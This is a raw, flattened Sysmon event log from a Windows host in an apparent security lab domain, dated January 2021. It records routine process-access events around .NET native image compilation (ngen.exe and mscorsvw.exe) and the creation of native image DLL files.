13:26:54.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469E-6000-B404-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.576{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-469E-6000-B404-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.576{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469E-6000-B404-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.373{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469E-6000-B304-000000009A01}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.357{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-469E-6000-B304-000000009A01}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.357{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469E-6000-B304-000000009A01}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:54.295{08A6967A-469E-6000-B204-000000009A01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1004-0\System.Web.DataVisualization.Design.dll2021-01-14 13:26:54.295 10341000x80000000000000008836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.092{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469E-6000-B204-000000009A01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.076{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-469E-6000-B204-000000009A01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.076{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469E-6000-B204-000000009A01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:54.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469E-6000-B104-000000009A01}3720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:53.998{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-469E-6000-B104-000000009A01}3720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:53.998{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469E-6000-B104-000000009A01}3720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:55.779{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469F-6000-B504-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:55.764{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-469F-6000-B504-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:55.764{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469F-6000-B504-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:55.623{08A6967A-469E-6000-B404-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\574-0\System.Web.Extensions.dll2021-01-14 13:26:55.623 10341000x80000000000000008867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.982{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A0-6000-BB04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.982{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A0-6000-BB04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A0-6000-BA04-000000009A01}32C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.889{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46A0-6000-BA04-000000009A01}32C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.889{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A0-6000-BA04-000000009A01}32C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:56.826{08A6967A-46A0-6000-B904-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f80-0\System.Web.Entity.dll2021-01-14 13:26:56.826 10341000x80000000000000008861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A0-6000-B904-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.576{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46A0-6000-B904-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.576{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A0-6000-B904-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 